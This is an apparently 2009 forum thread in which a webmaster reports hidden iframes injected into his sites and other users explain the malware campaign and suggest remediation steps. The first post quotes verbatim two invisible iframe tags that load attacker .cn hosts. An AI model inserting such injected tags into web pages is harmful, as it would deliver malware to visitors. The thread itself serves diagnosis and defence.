Protection from JavaScript Injection

[Ashif]

Hi,
i want to ask that is it possible that using javascript injection the contents of a web page can be altered (add / edit / deleted) in Line of Code.

Since, this has happened with me couple of times,

talking to the support team at my hosting provider, they say that its due to the security holes in the Coding, but i think that its the security issue at the hosting side (since modifying the web pages code)

i've found this code immediately after the opening of the body tag

Code:

<iframe src="http://hugetoplocate.cn:8080/index.php" width=153 height=198 style="visibility: hidden"></iframe>

earlier the page snoofing for the above URL was working, but now its not producing the output. (so can not post whats inside it).

My Another website (hosted by the same provider) is also infected. there the code immediately after the body tag is

Code:

<iframe src="http://globalnameshop.cn:8080/index.php" width=129 height=112 style="visibility: hidden"></iframe>

again the page snoofing yeilds no output with the error

Quote:

No such page found. Please verify that page URL and try again

need guideline regarding its solution and more information.

Thanking in anticipation.

[Philip M]

Yes, it is indeed possible, but the problem is with the server and your ISP who has not implemented appropriate security measures to prevent this.

Google for more information but an example is:-

http://en.wikipedia.org/wiki/Code_injection

Change your passwords!

[Ashif]

well, thanks,

but the examples shown there does not tell how the JavaScript Atack can modify the page contents. Its all about changging cookies, and form data,

i've uploaded my website serveral times, but i think my web's in hackers directory, and my site got attacked again n again.

[Philip M]

You don't care how it is done - you want to prevent it from happenning at all.

Change your host!

[Norv]

It seems that the problem you're having has been a huge web attack last month, affecting many sites. The .cn links, loaded in iframes, contain (or execute scripts that ultimately result in) malicious code, including a Trojan and keylogger that gets on visitors' computers, including on the computers of forums administrator's, like myself, like yourself, and steals their ftp passwords. Thus next time, after you clean the code, the malicious users log in with your credentials, and change it back.

Please take a look at:
http://blog.unmaskparasites.com/2009.../#comment-1201

http://garwarner.blogspot.com/2009/0...d-domains.html

Or, a number of recommendations from sophos labs, who name this particular type of malware, Troj/JSRedir-R :
http://www.sophos.com/blogs/sophoslabs/v/post/4422.

Good luck!

[Ashif]

thanks..

a reply from my hosting provider support team

Quote:

No matter you display a single line or a sophisticated page. JavaScript/iFrame injection has nothing to do with this. Instead of denying I would suggest you to study about these injections. Do not use any software’s like Plesk, DreamWeaver, Publisher, FP...etc for your pages as they use standard html tags while the current web situation forces you to write a secure script instead of using these simple programs.

..the current web situation forces you to write a secure script instead of using these simple programs...


what does this means ?

[Philip M]

No idea. Total chomp.

Change your ISP host ASAP!

But in the short term:-
Take the site down to protect other Internet users.
Replace the contents of the site with a known clean backup
Change all passwords on the site (including FTP credentials)
Patch all the sites software
Reload the site.

Get anti-virus software such as avast.